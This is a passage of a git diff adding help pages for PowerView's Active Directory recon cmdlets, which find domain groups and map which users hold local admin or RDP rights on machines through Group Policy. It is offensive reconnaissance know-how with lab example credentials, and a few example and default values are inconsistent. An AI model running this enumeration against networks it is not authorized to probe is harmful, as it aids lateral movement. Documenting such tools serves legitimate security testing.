+Specifies the domain to use for the query, defaults to the current domain.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -LDAPFilter

+Specifies an LDAP query string that is used to filter Active Directory objects.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: Filter

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Properties

+Specifies the properties of the output object to retrieve from the server.

+

+```yaml

+Type: String[]

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -SearchBase

+The LDAP source to search through, e.g.

+"LDAP://OU=secret,DC=testlab,DC=local"

+Useful for OU queries.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: ADSPath

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Server

+Specifies an Active Directory server (domain controller) to bind to.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: DomainController

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -SearchScope

+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: Subtree

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ResultPageSize

+Specifies the PageSize to set for the LDAP searcher object.

+

+```yaml

+Type: Int32

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: 200

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ServerTimeLimit

+Specifies the maximum amount of time the server spends searching.

+Default of 120 seconds.

+

+```yaml

+Type: Int32

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: 0

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -SecurityMasks

+Specifies an option for examining security information of a directory object.

+One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Tombstone

+Switch.

+Specifies that the searcher should also return deleted/tombstoned objects.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -FindOne

+Only return one result object.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: ReturnOne

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Credential

+A \[Management.Automation.PSCredential\] object of alternate credentials

+for connection to the target domain.

+

+```yaml

+Type: PSCredential

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: [Management.Automation.PSCredential]::Empty

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Raw

+Switch.

+Return raw results instead of translating the fields into a custom PSObject.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+## OUTPUTS

+

+### PowerView.GPO

+

+Custom PSObject with translated GPO property fields.

+

+PowerView.GPO.Raw

+

+The raw DirectoryServices.SearchResult object, if -Raw is enabled.

+

+## NOTES

+

+## RELATED LINKS

+

diff --git a/docs/Recon/Get-DomainGPOComputerLocalGroupMapping.md b/docs/Recon/Get-DomainGPOComputerLocalGroupMapping.md
new file mode 100755
index 0000000..4e5015b
--- /dev/null
+++ b/docs/Recon/Get-DomainGPOComputerLocalGroupMapping.md
@@ -0,0 +1,263 @@
+# Get-DomainGPOComputerLocalGroupMapping

+

+## SYNOPSIS

+Takes a computer (or GPO) object and determines what users/groups are in the specified

+local group for the machine through GPO correlation.

+

+Author: @harmj0y  

+License: BSD 3-Clause  

+Required Dependencies: Get-DomainComputer, Get-DomainOU, Get-NetComputerSiteName, Get-DomainSite, Get-DomainGPOLocalGroup

+

+## SYNTAX

+

+### ComputerIdentity (Default)

+```

+Get-DomainGPOComputerLocalGroupMapping [-ComputerIdentity] <String> [-LocalGroup <String>] [-Domain <String>]

+ [-SearchBase <String>] [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>]

+ [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>]

+```

+

+### OUIdentity

+```

+Get-DomainGPOComputerLocalGroupMapping -OUIdentity <String> [-LocalGroup <String>] [-Domain <String>]

+ [-SearchBase <String>] [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>]

+ [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>]

+```

+

+## DESCRIPTION

+This function is the inverse of Get-DomainGPOUserLocalGroupMapping, and finds what users/groups

+are in the specified local group for a target machine through GPO correlation.

+

+If a -ComputerIdentity is specified, retrieve the complete computer object, attempt to

+determine the OU the computer is a part of.

+Then resolve the computer's site name with

+Get-NetComputerSiteName and retrieve all sites object Get-DomainSite.

+For those results, attempt to

+enumerate all linked GPOs and associated local group settings with Get-DomainGPOLocalGroup.

+For

+each resulting GPO group, resolve the resulting user/group name to a full AD object and

+return the results.

+This will return the domain objects that are members of the specified

+-LocalGroup for the given computer.

+

+Otherwise, if -OUIdentity is supplied, the same process is executed to find linked GPOs and

+localgroup specifications.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Get-DomainGPOComputerLocalGroupMapping -ComputerName WINDOWS3.testlab.local

+```

+

+Finds users who have local admin rights over WINDOWS3 through GPO correlation.

+

+### -------------------------- EXAMPLE 2 --------------------------

+```

+Get-DomainGPOComputerLocalGroupMapping -Domain dev.testlab.local -ComputerName WINDOWS4.dev.testlab.local -LocalGroup RDP

+```

+

+Finds users who have RDP rights over WINDOWS4 through GPO correlation.

+

+### -------------------------- EXAMPLE 3 --------------------------

+```

+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force

+```

+

+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)

+Get-DomainGPOComputerLocalGroupMapping -Credential $Cred -ComputerIdentity SQL.testlab.local

+

+## PARAMETERS

+

+### -ComputerIdentity

+A SamAccountName (e.g.

+WINDOWS10$), DistinguishedName (e.g.

+CN=WINDOWS10,CN=Computers,DC=testlab,DC=local),

+SID (e.g.

+S-1-5-21-890171859-3433809279-3366196753-1124), GUID (e.g.

+4f16b6bc-7010-4cbf-b628-f3cfe20f6994),

+or a dns host name (e.g.

+windows10.testlab.local) for the computer to identity GPO local group mappings for.

+

+```yaml

+Type: String

+Parameter Sets: ComputerIdentity

+Aliases: ComputerName, Computer, DistinguishedName, SamAccountName, Name

+

+Required: True

+Position: 1

+Default value: None

+Accept pipeline input: True (ByPropertyName, ByValue)

+Accept wildcard characters: False

+```

+

+### -OUIdentity

+An OU name (e.g.

+TestOU), DistinguishedName (e.g.

+OU=TestOU,DC=testlab,DC=local), or

+GUID (e.g.

+8a9ba22a-8977-47e6-84ce-8c26af4e1e6a) for the OU to identity GPO local group mappings for.

+

+```yaml

+Type: String

+Parameter Sets: OUIdentity

+Aliases: OU

+

+Required: True

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -LocalGroup

+The local group to check access against.

+Can be "Administrators" (S-1-5-32-544), "RDP/Remote Desktop Users" (S-1-5-32-555),

+or a custom local SID.

+Defaults to local 'Administrators'.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: Administrators

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Domain

+Specifies the domain to enumerate GPOs for, defaults to the current domain.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -SearchBase

+{{Fill SearchBase Description}}

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: ADSPath

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Server

+Specifies an Active Directory server (domain controller) to bind to.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: DomainController

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -SearchScope

+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: Subtree

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ResultPageSize

+Specifies the PageSize to set for the LDAP searcher object.

+

+```yaml

+Type: Int32

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: 200

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ServerTimeLimit

+Specifies the maximum amount of time the server spends searching.

+Default of 120 seconds.

+

+```yaml

+Type: Int32

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: 0

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Tombstone

+Switch.

+Specifies that the searcher should also return deleted/tombstoned objects.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Credential

+A \[Management.Automation.PSCredential\] object of alternate credentials

+for connection to the target domain.

+

+```yaml

+Type: PSCredential

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: [Management.Automation.PSCredential]::Empty

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+## OUTPUTS

+

+### PowerView.GGPOComputerLocalGroupMember

+

+## NOTES

+

+## RELATED LINKS

+

diff --git a/docs/Recon/Get-DomainGPOLocalGroup.md b/docs/Recon/Get-DomainGPOLocalGroup.md
new file mode 100755
index 0000000..e61fb82
--- /dev/null
+++ b/docs/Recon/Get-DomainGPOLocalGroup.md
@@ -0,0 +1,259 @@
+# Get-DomainGPOLocalGroup

+

+## SYNOPSIS

+Returns all GPOs in a domain that modify local group memberships through 'Restricted Groups'

+or Group Policy preferences.

+Also return their user membership mappings, if they exist.

+

+Author: @harmj0y  

+License: BSD 3-Clause  

+Required Dependencies: Get-DomainGPO, Get-GptTmpl, Get-GroupsXML, ConvertTo-SID, ConvertFrom-SID

+

+## SYNTAX

+

+```

+Get-DomainGPOLocalGroup [[-Identity] <String[]>] [-ResolveMembersToSIDs] [-Domain <String>]

+ [-LDAPFilter <String>] [-SearchBase <String>] [-Server <String>] [-SearchScope <String>]

+ [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>]

+```

+

+## DESCRIPTION

+First enumerates all GPOs in the current/target domain using Get-DomainGPO with passed

+arguments, and for each GPO checks if 'Restricted Groups' are set with GptTmpl.inf or

+group membership is set through Group Policy Preferences groups.xml files.

+For any

+GptTmpl.inf files found, the file is parsed with Get-GptTmpl and any 'Group Membership'

+section data is processed if present.

+Any found Groups.xml files are parsed with

+Get-GroupsXML and those memberships are returned as well.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Get-DomainGPOLocalGroup

+```

+

+Returns all local groups set by GPO along with their members and memberof.

+

+### -------------------------- EXAMPLE 2 --------------------------

+```

+Get-DomainGPOLocalGroup -ResolveMembersToSIDs

+```

+

+Returns all local groups set by GPO along with their members and memberof,

+and resolve any members to their domain SIDs.

+

+### -------------------------- EXAMPLE 3 --------------------------

+```

+'{0847C615-6C4E-4D45-A064-6001040CC21C}' | Get-DomainGPOLocalGroup

+```

+

+Return any GPO-set groups for the GPO with the given name/GUID.

+

+### -------------------------- EXAMPLE 4 --------------------------

+```

+Get-DomainGPOLocalGroup 'Desktops'

+```

+

+Return any GPO-set groups for the GPO with the given display name.

+

+### -------------------------- EXAMPLE 5 --------------------------

+```

+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force

+```

+

+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)

+Get-DomainGPOLocalGroup -Credential $Cred

+

+## PARAMETERS

+

+### -Identity

+A display name (e.g.

+'Test GPO'), DistinguishedName (e.g.

+'CN={F260B76D-55C8-46C5-BEF1-9016DD98E272},CN=Policies,CN=System,DC=testlab,DC=local'),

+GUID (e.g.

+'10ec320d-3111-4ef4-8faf-8f14f4adc789'), or GPO name (e.g.

+'{F260B76D-55C8-46C5-BEF1-9016DD98E272}').

+Wildcards accepted.

+

+```yaml

+Type: String[]

+Parameter Sets: (All)

+Aliases: DistinguishedName, SamAccountName, Name

+

+Required: False

+Position: 1

+Default value: None

+Accept pipeline input: True (ByPropertyName, ByValue)

+Accept wildcard characters: False

+```

+

+### -ResolveMembersToSIDs

+Switch.

+Indicates that any member names should be resolved to their domain SIDs.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Domain

+Specifies the domain to use for the query, defaults to the current domain.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -LDAPFilter

+Specifies an LDAP query string that is used to filter Active Directory objects.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: Filter

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -SearchBase

+The LDAP source to search through, e.g.

+"LDAP://OU=secret,DC=testlab,DC=local"

+Useful for OU queries.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: ADSPath

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Server

+Specifies an Active Directory server (domain controller) to bind to.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: DomainController

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -SearchScope

+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: Subtree

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ResultPageSize

+Specifies the PageSize to set for the LDAP searcher object.

+

+```yaml

+Type: Int32

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: 200

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ServerTimeLimit

+Specifies the maximum amount of time the server spends searching.

+Default of 120 seconds.

+

+```yaml

+Type: Int32

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: 0

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Tombstone

+Switch.

+Specifies that the searcher should also return deleted/tombstoned objects.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Credential

+A \[Management.Automation.PSCredential\] object of alternate credentials

+for connection to the target domain.

+

+```yaml

+Type: PSCredential

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: [Management.Automation.PSCredential]::Empty

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+## OUTPUTS

+

+### PowerView.GPOGroup

+

+## NOTES

+

+## RELATED LINKS

+

+[https://morgansimonsenblog.azurewebsites.net/tag/groups/](https://morgansimonsenblog.azurewebsites.net/tag/groups/)

+

diff --git a/docs/Recon/Get-DomainGPOUserLocalGroupMapping.md b/docs/Recon/Get-DomainGPOUserLocalGroupMapping.md
new file mode 100755
index 0000000..d42a4be
--- /dev/null
+++ b/docs/Recon/Get-DomainGPOUserLocalGroupMapping.md
@@ -0,0 +1,258 @@
+# Get-DomainGPOUserLocalGroupMapping

+

+## SYNOPSIS

+Enumerates the machines where a specific domain user/group is a member of a specific

+local group, all through GPO correlation.

+If no user/group is specified, all

+discoverable mappings are returned.

+

+Author: @harmj0y  

+License: BSD 3-Clause  

+Required Dependencies: Get-DomainGPOLocalGroup, Get-DomainObject, Get-DomainComputer, Get-DomainOU, Get-DomainSite, Get-DomainGroup

+

+## SYNTAX

+

+```

+Get-DomainGPOUserLocalGroupMapping [[-Identity] <String>] [-LocalGroup <String>] [-Domain <String>]

+ [-SearchBase <String>] [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>]

+ [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>]

+```

+

+## DESCRIPTION

+Takes a user/group name and optional domain, and determines the computers in the domain

+the user/group has local admin (or RDP) rights to.

+

+It does this by:

+    1. 

+resolving the user/group to its proper SID

+    2. 

+enumerating all groups the user/group is a current part of

+        and extracting all target SIDs to build a target SID list

+    3. 

+pulling all GPOs that set 'Restricted Groups' or Groups.xml by calling

+        Get-DomainGPOLocalGroup

+    4. 

+matching the target SID list to the queried GPO SID list

+        to enumerate all GPO the user is effectively applied with

+    5. 

+enumerating all OUs and sites and applicable GPO GUIs are

+        applied to through gplink enumerating

+    6. 

+querying for all computers under the given OUs or sites

+

+If no user/group is specified, all user/group -\> machine mappings discovered through

+GPO relationships are returned.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Find-GPOLocation

+```

+

+Find all user/group -\> machine relationships where the user/group is a member

+of the local administrators group on target machines.

+

+### -------------------------- EXAMPLE 2 --------------------------

+```

+Find-GPOLocation -UserName dfm -Domain dev.testlab.local

+```

+

+Find all computers that dfm user has local administrator rights to in

+the dev.testlab.local domain.

+

+### -------------------------- EXAMPLE 3 --------------------------

+```

+Find-GPOLocation -UserName dfm -Domain dev.testlab.local

+```

+

+Find all computers that dfm user has local administrator rights to in

+the dev.testlab.local domain.

+

+### -------------------------- EXAMPLE 4 --------------------------

+```

+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force

+```

+

+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)

+Get-DomainGPOUserLocalGroupMapping -Credential $Cred

+

+## PARAMETERS

+

+### -Identity

+A SamAccountName (e.g.

+harmj0y), DistinguishedName (e.g.

+CN=harmj0y,CN=Users,DC=testlab,DC=local),

+SID (e.g.

+S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g.

+4c435dd7-dc58-4b14-9a5e-1fdb0e80d201)

+for the user/group to identity GPO local group mappings for.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: DistinguishedName, SamAccountName, Name

+

+Required: False

+Position: 1

+Default value: None

+Accept pipeline input: True (ByPropertyName, ByValue)

+Accept wildcard characters: False

+```

+

+### -LocalGroup

+The local group to check access against.

+Can be "Administrators" (S-1-5-32-544), "RDP/Remote Desktop Users" (S-1-5-32-555),

+or a custom local SID.

+Defaults to local 'Administrators'.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: Administrators

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Domain

+Specifies the domain to enumerate GPOs for, defaults to the current domain.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -SearchBase

+{{Fill SearchBase Description}}

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: ADSPath

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Server

+Specifies an Active Directory server (domain controller) to bind to.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: DomainController

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -SearchScope

+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: Subtree

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ResultPageSize

+Specifies the PageSize to set for the LDAP searcher object.

+

+```yaml

+Type: Int32

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: 200

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ServerTimeLimit

+Specifies the maximum amount of time the server spends searching.

+Default of 120 seconds.

+

+```yaml

+Type: Int32

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: 0

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Tombstone

+Switch.

+Specifies that the searcher should also return deleted/tombstoned objects.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Credential

+A \[Management.Automation.PSCredential\] object of alternate credentials

+for connection to the target domain.

+

+```yaml

+Type: PSCredential

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: [Management.Automation.PSCredential]::Empty

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+## OUTPUTS

+

+### PowerView.GPOLocalGroupMapping

+

+A custom PSObject containing any target identity information and what local

+group memberships they're a part of through GPO correlation.

+

+## NOTES

+

+## RELATED LINKS

+

+[http://www.harmj0y.net/blog/redteaming/where-my-admins-at-gpo-edition/](http://www.harmj0y.net/blog/redteaming/where-my-admins-at-gpo-edition/)

+

diff --git a/docs/Recon/Get-DomainGroup.md b/docs/Recon/Get-DomainGroup.md
new file mode 100755
index 0000000..faaa082
--- /dev/null
+++ b/docs/Recon/Get-DomainGroup.md
@@ -0,0 +1,397 @@
+# Get-DomainGroup

+

+## SYNOPSIS

+Return all groups or specific group objects in AD.

+

+Author: Will Schroeder (@harmj0y)  

+License: BSD 3-Clause  

+Required Dependencies: Get-DomainSearcher, Get-DomainObject, Convert-ADName, Convert-LDAPProperty

+

+## SYNTAX

+

+```

+Get-DomainGroup [[-Identity] <String[]>] [-MemberIdentity <String>] [-AdminCount] [-Domain <String>]

+ [-LDAPFilter <String>] [-Properties <String[]>] [-SearchBase <String>] [-Server <String>]

+ [-SearchScope <String>] [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-SecurityMasks <String>]

+ [-Tombstone] [-FindOne] [-Credential <PSCredential>] [-Raw]

+```

+

+## DESCRIPTION

+Builds a directory searcher object using Get-DomainSearcher, builds a custom

+LDAP filter based on targeting/filter parameters, and searches for all objects

+matching the criteria.

+To only return specific properies, use

+"-Properties samaccountname,usnchanged,...".

+By default, all group objects for

+the current domain are returned.

+To return the groups a specific user/group is

+a part of, use -MemberIdentity X to execute token groups enumeration.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Get-DomainGroup | select samaccountname

+```

+

+samaccountname

+--------------

+WinRMRemoteWMIUsers__

+Administrators

+Users

+Guests

+Print Operators

+Backup Operators

+...

+

+### -------------------------- EXAMPLE 2 --------------------------

+```

+Get-DomainGroup *admin* | select distinguishedname

+```

+

+distinguishedname

+-----------------

+CN=Administrators,CN=Builtin,DC=testlab,DC=local

+CN=Hyper-V Administrators,CN=Builtin,DC=testlab,DC=local

+CN=Schema Admins,CN=Users,DC=testlab,DC=local

+CN=Enterprise Admins,CN=Users,DC=testlab,DC=local

+CN=Domain Admins,CN=Users,DC=testlab,DC=local

+CN=DnsAdmins,CN=Users,DC=testlab,DC=local

+CN=Server Admins,CN=Users,DC=testlab,DC=local

+CN=Desktop Admins,CN=Users,DC=testlab,DC=local

+

+### -------------------------- EXAMPLE 3 --------------------------

+```

+Get-DomainGroup -Properties samaccountname -Identity 'S-1-5-21-890171859-3433809279-3366196753-1117' | fl

+```

+

+samaccountname

+--------------

+Server Admins

+

+### -------------------------- EXAMPLE 4 --------------------------

+```

+'CN=Desktop Admins,CN=Users,DC=testlab,DC=local' | Get-DomainGroup -Server primary.testlab.local -Verbose

+```

+

+VERBOSE: Get-DomainSearcher search string: LDAP://DC=testlab,DC=local

+VERBOSE: Get-DomainGroup filter string: (&(objectCategory=group)(|(distinguishedname=CN=DesktopAdmins,CN=Users,DC=testlab,DC=local)))

+

+usncreated            : 13245

+grouptype             : -2147483646

+samaccounttype        : 268435456

+samaccountname        : Desktop Admins

+whenchanged           : 8/10/2016 12:30:30 AM

+objectsid             : S-1-5-21-890171859-3433809279-3366196753-1118

+objectclass           : {top, group}

+cn                    : Desktop Admins

+usnchanged            : 13255

+dscorepropagationdata : 1/1/1601 12:00:00 AM

+name                  : Desktop Admins

+distinguishedname     : CN=Desktop Admins,CN=Users,DC=testlab,DC=local

+member                : CN=Andy Robbins (admin),CN=Users,DC=testlab,DC=local

+whencreated           : 8/10/2016 12:29:43 AM

+instancetype          : 4

+objectguid            : f37903ed-b333-49f4-abaa-46c65e9cca71

+objectcategory        : CN=Group,CN=Schema,CN=Configuration,DC=testlab,DC=local

+

+### -------------------------- EXAMPLE 5 --------------------------

+```

+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force

+```

+

+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)

+Get-DomainGroup -Credential $Cred

+

+### -------------------------- EXAMPLE 6 --------------------------

+```

+Get-Domain | Select-Object -Expand name

+```

+

+testlab.local

+

+'DEV\Domain Admins' | Get-DomainGroup -Verbose -Properties distinguishedname

+VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local

+VERBOSE: \[Get-DomainGroup\] Extracted domain 'dev.testlab.local' from 'DEV\Domain Admins'

+VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=dev,DC=testlab,DC=local

+VERBOSE: \[Get-DomainGroup\] filter string: (&(objectCategory=group)(|(samAccountName=Domain Admins)))

+

+distinguishedname

+-----------------

+CN=Domain Admins,CN=Users,DC=dev,DC=testlab,DC=local

+

+## PARAMETERS

+

+### -Identity

+A SamAccountName (e.g.

+Group1), DistinguishedName (e.g.

+CN=group1,CN=Users,DC=testlab,DC=local),

+SID (e.g.

+S-1-5-21-890171859-3433809279-3366196753-1114), or GUID (e.g.

+4c435dd7-dc58-4b14-9a5e-1fdb0e80d202)

+specifying the group to query for.

+Wildcards accepted.

+

+```yaml

+Type: String[]

+Parameter Sets: (All)

+Aliases: DistinguishedName, SamAccountName, Name, MemberDistinguishedName, MemberName

+

+Required: False

+Position: 1

+Default value: None

+Accept pipeline input: True (ByPropertyName, ByValue)

+Accept wildcard characters: False

+```

+

+### -MemberIdentity

+A SamAccountName (e.g.

+Group1), DistinguishedName (e.g.

+CN=group1,CN=Users,DC=testlab,DC=local),

+SID (e.g.

+S-1-5-21-890171859-3433809279-3366196753-1114), or GUID (e.g.

+4c435dd7-dc58-4b14-9a5e-1fdb0e80d202)

+specifying the user/group member to query for group membership.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: UserName

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -AdminCount

+Switch.

+Return users with '(adminCount=1)' (meaning are/were privileged).

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Domain

+Specifies the domain to use for the query, defaults to the current domain.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -LDAPFilter

+Specifies an LDAP query string that is used to filter Active Directory objects.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: Filter

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Properties

+Specifies the properties of the output object to retrieve from the server.

+

+```yaml

+Type: String[]

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -SearchBase

+The LDAP source to search through, e.g.

+"LDAP://OU=secret,DC=testlab,DC=local"

+Useful for OU queries.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: ADSPath

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Server

+Specifies an Active Directory server (domain controller) to bind to.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: DomainController

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -SearchScope

+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: Subtree

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ResultPageSize

+Specifies the PageSize to set for the LDAP searcher object.

+

+```yaml

+Type: Int32

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: 200

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ServerTimeLimit

+Specifies the maximum amount of time the server spends searching.

+Default of 120 seconds.

+

+```yaml

